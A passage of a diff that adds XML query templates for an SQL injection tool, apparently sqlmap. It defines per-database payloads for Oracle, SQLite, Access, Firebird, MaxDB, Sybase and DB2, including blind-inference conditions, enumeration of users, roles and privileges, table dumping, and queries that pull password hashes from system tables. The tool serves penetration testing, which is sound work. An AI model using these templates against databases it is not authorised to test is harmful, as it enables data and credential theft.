+        </search_table>
+        <search_column>
+            <inband query="SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype IN ('u','v')" condition="[DB]..syscolumns.name" condition2="[DB]..sysobjects.name"/>
+            <blind query="SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype IN ('u','v')" count="SELECT COUNT(%s..sysobjects.name) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype IN ('u','v')" condition="[DB]..syscolumns.name" condition2="[DB]..sysobjects.name"/>
+        </search_column>
+    </dbms>
+
+    <!-- Oracle -->
+    <dbms value="Oracle">
+        <cast query="CAST(%s AS VARCHAR(4000))"/>
+        <length query="LENGTH(%s)"/>
+        <isnull query="NVL(%s,' ')"/>
+        <delimiter query="||"/>
+        <limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
+        <limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
+        <limitgroupstart/>
+        <limitgroupstop/>
+        <limitstring/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--"/>
+        <substring query="SUBSTRC((%s),%d,%d)"/>
+        <concatenate query="%s||%s"/>
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        <hex query="RAWTOHEX(%s)"/>
+        <inference query="ASCII(SUBSTRC((%s),%d,1))>%d"/>
+        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
+        <current_user query="SELECT USER FROM DUAL"/>
+        <!--
+        NOTE: current physical DB but not usable for enumeration
+        <current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
+        -->
+        <current_db query="SELECT USER FROM DUAL"/>
+        <!--
+             NOTE: in Oracle to check if the session user is DBA you can use:
+             SELECT USERENV('ISDBA') FROM DUAL
+        -->
+        <hostname query="SELECT UTL_INADDR.GET_HOST_NAME FROM DUAL"/>
+        <table_comment query="SELECT COMMENTS FROM ALL_TAB_COMMENTS WHERE OWNER='%s' AND TABLE_NAME='%s'"/>
+        <column_comment query="SELECT COMMENTS FROM ALL_COL_COMMENTS WHERE OWNER='%s' AND TABLE_NAME='%s' AND COLUMN_NAME='%s'"/>
+        <is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
+        <users>
+            <inband query="SELECT USERNAME FROM SYS.ALL_USERS"/>
+            <blind query="SELECT USERNAME FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(USERNAME) FROM SYS.ALL_USERS"/>
+        </users>
+        <passwords>
+            <inband query="SELECT NAME,PASSWORD FROM SYS.USER$" condition="NAME"/>
+            <blind query="SELECT PASSWORD FROM (SELECT PASSWORD,ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(PASSWORD) FROM SYS.USER$ WHERE NAME='%s'"/>
+        </passwords>
+        <!--
+             NOTE: in Oracle to enumerate the privileges for the session user you can use:
+             SELECT * FROM SESSION_PRIVS
+        -->
+        <privileges>
+            <inband query="SELECT GRANTEE,PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME,PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
+            <blind query="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(PRIVILEGE) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(PRIVILEGE) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
+        </privileges>
+        <!--
+             NOTE: in Oracle to enumerate the roles for the session user you can use:
+             SELECT * FROM SESSION_ROLES
+        -->
+        <roles>
+            <inband query="SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME,GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
+            <blind query="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
+        </roles>
+        <statements>
+            <inband query="SELECT SQL_TEXT FROM V$SQL"/>
+            <blind query="SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS LIMIT FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE LIMIT=%d" count="SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'"/>
+        </statements>
+        <!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
+        <dbs>
+            <inband query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)"/>
+            <blind query="SELECT OWNER FROM (SELECT OWNER,ROWNUM AS LIMIT FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES" condition="OWNER"/>
+            <blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
+            <blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND OWNER='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s"/>
+            <blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS LIMIT FROM %s qq) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
+        </dump_table>
+        <!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
+        <search_db>
+            <inband query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) WHERE %s" condition="OWNER"/>
+            <blind query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) WHERE %s" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES WHERE %s" condition="OWNER"/>
+        </search_db>
+        <search_table>
+            <inband query="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE %s" condition="TABLE_NAME" condition2="OWNER"/>
+            <blind query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES WHERE %s)" query2="SELECT TABLE_NAME FROM (SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s')" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TABLES WHERE OWNER='%s'" condition="TABLE_NAME" condition2="OWNER"/>
+        </search_table>
+        <search_column>
+            <inband query="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE %s" condition="COLUMN_NAME" condition2="OWNER" condition3="TABLE_NAME"/>
+            <blind query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TAB_COLUMNS WHERE %s)" query2="SELECT TABLE_NAME FROM (SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE OWNER='%s')" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TAB_COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS WHERE OWNER='%s'" condition="COLUMN_NAME" condition2="OWNER" condition3="TABLE_NAME"/>
+        </search_column>
+    </dbms>
+
+    <!-- SQLite -->
+    <dbms value="SQLite">
+        <cast query="CAST(%s AS TEXT)" dbms_version="&gt;=3.0"/>
+        <!-- NOTE: On SQLite version 2 everything is stored as a string (Reference: http://www.mono-project.com/SQLite) -->
+        <length query="LENGTH(%s)"/>
+        <isnull query="COALESCE(%s,' ')"/>
+        <delimiter query="||"/>
+        <limit query="LIMIT %d,%d"/>
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="2"/>
+        <limitstring query=" LIMIT "/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--" query2="/*"/>
+        <substring query="SUBSTR((%s),%d,%d)"/>
+        <concatenate query="%s||%s"/>
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        <hex query="HEX(%s)"/>
+        <inference query="SUBSTR((%s),%d,1)>'%c'"/>
+        <banner query="SELECT SQLITE_VERSION()"/>
+        <current_user/>
+        <current_db/>
+        <hostname/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba/>
+        <check_udf/>
+        <users/>
+        <passwords/>
+        <privileges/>
+        <roles/>
+        <statements/>
+        <dbs/>
+        <tables>
+            <inband query="SELECT tbl_name FROM sqlite_master WHERE type='table'"/>
+            <blind query="SELECT tbl_name FROM sqlite_master WHERE type='table' LIMIT %d,1" count="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT MIN(sql) FROM sqlite_master WHERE tbl_name='%s'"/>
+            <blind query="SELECT sql FROM sqlite_master WHERE tbl_name='%s' LIMIT 1" condition=""/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s"/>
+            <blind query="SELECT %s FROM %s LIMIT %d,1" count="SELECT COUNT(*) FROM %s"/>
+        </dump_table>
+        <search_db/>
+        <search_table>
+            <inband query="SELECT tbl_name FROM sqlite_master WHERE type='table' AND %s" condition="tbl_name" condition2=""/>
+            <blind query="" query2="SELECT tbl_name FROM sqlite_master WHERE type='table'" count="" count2="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'" condition="tbl_name" condition2=""/>
+        </search_table>
+        <search_column/>
+    </dbms>
+
+    <!-- Microsoft Access -->
+    <dbms value="Microsoft Access">
+        <cast query="RTRIM(CVAR(%s))"/>
+        <length query="LEN(RTRIM(CVAR(%s)))"/>
+        <isnull query="IIF(LEN(%s)=0,' ',%s)"/>
+        <delimiter query="&amp;"/>
+        <limit query="TOP %d"/>
+        <limitregexp query="\s+TOP\s+([\d]+)"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="1"/>
+        <limitstring query=" TOP "/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="%16" query2="%00"/>
+        <substring query="MID((%s),%d,%d)"/>
+        <concatenate query="%s&amp;%s"/>
+        <case query="SELECT (IIF(%s,1,0))"/>
+        <inference query="ASCW(MID((%s),%d,1))>%d"/>
+        <banner/>
+        <!--CURRENTUSER() is not available outside the MS Access query tool itself-->
+        <current_user/>
+        <current_db/>
+        <hostname/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba/>
+        <dbs/>
+        <!--MSysObjects have no read permission by default-->
+        <tables>
+            <inband query="SELECT Name FROM MSysObjects WHERE Type=1"/>
+            <blind query="SELECT MIN(Name) FROM MSysObjects WHERE Type=1 AND Name>'%s'" count="SELECT COUNT(Name) FROM MSysObjects WHERE Type=1"/>
+        </tables>
+        <dump_table>
+            <inband query="SELECT %s FROM %s"/>
+            <blind query="SELECT MIN(%s) FROM %s WHERE CVAR(%s)>'%s'" query2="SELECT TOP 1 %s FROM %s WHERE CVAR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s)"/>
+        </dump_table>
+        <users/>
+        <privileges/>
+        <roles/>
+        <statements/>
+        <search_db/>
+        <search_table/>
+        <search_column/>
+   </dbms>
+
+   <!-- Firebird -->
+   <dbms value="Firebird">
+        <cast query="TRIM(CAST(%s AS VARCHAR(10000)))"/>
+        <length query="CHAR_LENGTH(TRIM(%s))"/>
+        <delimiter query="||"/>
+        <limit query="ROWS %d TO %d"/>
+        <limitregexp query="\s+ROWS\s+([\d]+)(\s+TO\s+([\d]+))?"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="2"/>
+        <limitstring query=" ROWS "/>
+        <isnull query="COALESCE(%s,' ')"/>
+        <order query="ORDER BY %s ASC"/>
+        <comment query="--"/>
+        <count query="COUNT(%s)"/>
+        <substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
+        <concatenate query="%s||%s"/>
+        <case query="SELECT IIF(%s,1,0)"/>
+        <inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1))>%d" dbms_version="&gt;=2.1" query2="SUBSTRING((%s) FROM %d FOR 1)>'%c'"/>
+        <banner query="SELECT RDB$GET_CONTEXT('SYSTEM','ENGINE_VERSION') FROM RDB$DATABASE" dbms_version="&gt;=2.1"/>
+        <current_user query="SELECT CURRENT_USER FROM RDB$DATABASE"/>
+        <current_db query="SELECT RDB$GET_CONTEXT('SYSTEM','DB_NAME') FROM RDB$DATABASE"/>
+        <hostname/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba query="CURRENT_USER='SYSDBA'"/>
+        <users>
+            <inband query="SELECT RDB$USER FROM RDB$USER_PRIVILEGES"/>
+            <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
+        </users>
+        <tables>
+            <inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
+            <blind query="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
+        </tables>
+        <privileges>
+            <inband query="SELECT RDB$USER,RDB$PRIVILEGE FROM RDB$USER_PRIVILEGES" condition="RDB$USER"/>
+            <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$PRIVILEGE) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'" count="SELECT COUNT(DISTINCT(RDB$PRIVILEGE)) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'"/>
+        </privileges>
+        <roles/>
+        <statements/>
+        <dbs/>
+        <columns>
+            <!--<inband query="SELECT r.RDB$FIELD_NAME,CASE f.RDB$FIELD_TYPE WHEN 261 THEN 'BLOB' WHEN 14 THEN 'CHAR' WHEN 40 THEN 'CSTRING' WHEN 11 THEN 'D_FLOAT' WHEN 27 THEN 'DOUBLE' WHEN 10 THEN 'FLOAT' WHEN 16 THEN 'INT64' WHEN 8 THEN 'INTEGER' WHEN 9 THEN 'QUAD' WHEN 7 THEN 'SMALLINT' WHEN 12 THEN 'DATE' WHEN 13 THEN 'TIME' WHEN 35 THEN 'TIMESTAMP' WHEN 37 THEN 'VARCHAR' ELSE 'UNKNOWN' END AS field_type FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>-->
+            <inband query="SELECT r.RDB$FIELD_NAME,f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>
+            <blind query="SELECT r.RDB$FIELD_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'" query2="SELECT f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s' AND r.RDB$FIELD_NAME='%s'" count="SELECT COUNT(r.RDB$FIELD_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s"/>
+            <blind query="SELECT FIRST 1 SKIP %d %s FROM %s" count="SELECT COUNT(*) FROM %s"/>
+        </dump_table>
+        <search_db/>
+        <search_table>
+            <inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0) AND %s" condition="RDB$RELATION_NAME" condition2=""/>
+            <blind query="" query2="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" count="" count2="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" condition="RDB$RELATION_NAME" condition2=""/>
+        </search_table>
+        <search_column/>
+   </dbms>
+
+   <!-- SAP MaxDB -->
+   <!-- http://dev.mysql.com/tech-resources/articles/maxdb-php-ready-for-web.html -->
+   <!-- http://dev.mysql.com/doc/refman/5.0/es/maxdb-reserved-words.html -->
+   <!-- http://maxdb.sap.com/doc/7_6/default.htm -->
+   <!-- http://www.sapdb.org/7.4/htmhelp/35/f8823cb7e5d42be10000000a114027/content.htm -->
+   <!-- http://www.ximido.de/research/PenTestingMaxDB.pdf -->
+   <dbms value="SAP MaxDB">
+        <length query="LENGTH(%s)"/>
+        <isnull query="VALUE(%s,' ')" query2="IFNULL(%s,' ')"/>
+        <delimiter query=","/>
+        <limit query="LIMIT %d,%d"/>
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="2"/>
+        <!-- No real cast on SAP MaxDB -->
+        <cast query="REPLACE(CHR(%s),' ','_')"/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--" query2="#"/>
+        <substring query="SUBSTR((%s),%d,%d)"/>
+        <concatenate query="CONCAT(%s,%s)"/>
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        <hex query="HEX(%s)"/>
+        <inference query="SUBSTR((%s),%d,1)>'%c'"/>
+        <banner query="SELECT ID FROM SYSINFO.VERSION"/>
+        <current_user query="SELECT USER() FROM DUAL"/>
+        <current_db query="SELECT DATABASE() FROM DUAL"/>
+        <hostname/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba query="EXISTS(SELECT USER_ID FROM domain.users WHERE username=USER() AND usermode='SYSDBA')"/>
+        <users>
+            <inband query="SELECT username FROM domain.users"/>
+            <blind query="SELECT MIN(username) FROM domain.users WHERE username>'%s'" count="SELECT CHR(COUNT(*)) FROM domain.users"/>
+        </users>
+        <columns>
+            <inband query="SELECT columnname,datatype,len FROM domain.columns WHERE tablename='%s' AND schemaname=%s"/>
+            <blind/>
+        </columns>
+        <tables>
+            <inband query="SELECT tablename FROM domain.tables WHERE schemaname=%s AND type='TABLE'"/>
+            <blind/>
+        </tables> 
+        <dbs>
+            <inband query="SELECT DISTINCT(schemaname) FROM domain.tables"/>
+            <blind/>
+        </dbs>
+        <roles>
+            <inband query="SELECT owner,role FROM domain.roles" condition="owner"/>
+            <blind/>
+        </roles>
+        <statements/>
+        <dump_table>
+            <inband query="SELECT %s FROM %%s"/>
+            <blind query="SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
+        </dump_table>
+   </dbms>
+
+    <!-- Sybase -->
+    <dbms value="Sybase">
+        <cast query="CONVERT(VARCHAR(4000),%s)"/>
+        <length query="LTRIM(STR(LEN(%s)))"/>
+        <isnull query="ISNULL(%s,' ')"/>
+        <delimiter query="+"/>
+        <limit query="SELECT TOP %d "/>
+        <limitregexp query="TOP\s+([\d]+)\s+.+?\s+FROM\s+.+?\s+WHERE\s+.+?\s+NOT\s+IN\s+\(SELECT\s+TOP\s+([\d]+)\s+"/>
+        <limitgroupstart query="2"/>
+        <limitgroupstop query="1"/>
+        <limitstring/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--" query2="/*"/>
+        <substring query="SUBSTRING((%s),%d,%d)"/>
+        <concatenate query="%s+%s"/>
+        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
+        <hex query="BINTOSTR(CONVERT(VARBINARY,%s))"/>
+        <inference query="ASCII(SUBSTRING((%s),%d,1))>%d"/>
+        <banner query="SELECT @@VERSION"/>
+        <current_user query="SELECT SUSER_NAME()"/>
+        <current_db query="SELECT DB_NAME()"/>
+        <hostname/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba query="PATINDEX('%sa_role%',SHOW_ROLE())>0" query2="EXISTS(SELECT * FROM master..syslogins,master..sysloginroles WHERE srid=0 and name='%s')"/>
+        <users>
+            <inband query="SELECT name FROM master..syslogins"/>
+            <blind/>
+        </users>
+        <passwords>
+            <inband query="SELECT name,password FROM master..syslogins" condition="name"/>
+            <blind/>
+        </passwords>
+        <privileges/>
+        <roles>
+            <inband query="SELECT name,srid FROM master..syslogins,master..sysloginroles" condition="name"/>
+            <blind/>
+        </roles>
+        <statements/>
+        <dbs>
+            <inband query="SELECT name FROM master..sysdatabases"/>
+            <blind/>
+        </dbs>
+        <tables>
+            <inband query="SELECT name FROM %s..sysobjects WHERE type IN ('U')"/>
+            <blind/>
+        </tables>
+        <columns>
+            <inband query="SELECT %s..syscolumns.name,%s..syscolumns.usertype FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/>
+            <blind/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s.%s"/>
+            <blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
+        </dump_table>
+        <search_db>
+            <inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
+            <blind/>
+        </search_db>
+        <search_table>
+            <inband query="SELECT name FROM %s..sysobjects WHERE type IN ('U') AND " condition="name" condition2="name"/>
+            <blind/>
+        </search_table>
+        <search_column>
+            <inband query="SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id" condition="[DB]..syscolumns.name" condition2="[DB]..sysobjects.name"/>
+            <blind/>
+        </search_column>
+    </dbms>
+
+    <!-- IBM DB2 -->
+    <dbms value="IBM DB2">
+        <!-- Casting to varchar does not work with version < v9, so we had to use char(254) instead -->
+        <cast query="RTRIM(CAST(%s AS CHAR(254)))"/>
+        <length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
+        <isnull query="COALESCE(%s,' ')"/>
+        <delimiter query="||"/>
+        <limit query="ROW_NUMBER() OVER () AS LIMIT %s) AS qq WHERE LIMIT"/>
+        <limitregexp query="ROW_NUMBER\(\)\s+OVER\s+\(\)\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+"/>
+        <limitgroupstart/>
+        <limitgroupstop/>
+        <limitstring/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--"/>
+        <!-- TODO -->
+        <substring query="SUBSTR((%s),%d,%d)"/>
+        <concatenate query="%s||%s"/>
+        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSIBM.SYSDUMMY1"/>
+        <hex query="HEX(%s)"/>
+        <inference query="SUBSTR((%s),%d,1)>'%c'"/>
+        <!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
+        <banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS qq WHERE LIMIT=1"/>
+        <current_user query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
+        <!-- NOTE: On DB2 we use the current user as default schema (database) -->
+        <current_db query="SELECT current server FROM SYSIBM.SYSDUMMY1"/>
+        <hostname query="SELECT host_name FROM TABLE(sysproc.env_get_sys_info())"/>
+        <table_comment/>
+        <column_comment/>
+        <is_dba query="(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'"/>
+        <users>
+            <inband query="SELECT grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
+            <blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
+        </users>
+        <!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->        
+        <passwords/>
+        <privileges>
+            <inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
+            <blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
+        </privileges>
+        <roles/>
+        <statements/>
+        <!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
+        <dbs>
+            <inband query="SELECT schemaname FROM syscat.schemata"/>
+            <blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,schemaname FROM syscat.schemata) AS qq WHERE LIMIT=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT tabschema,tabname FROM sysstat.tables" condition="tabschema"/>
+            <blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
+            <blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s"/>
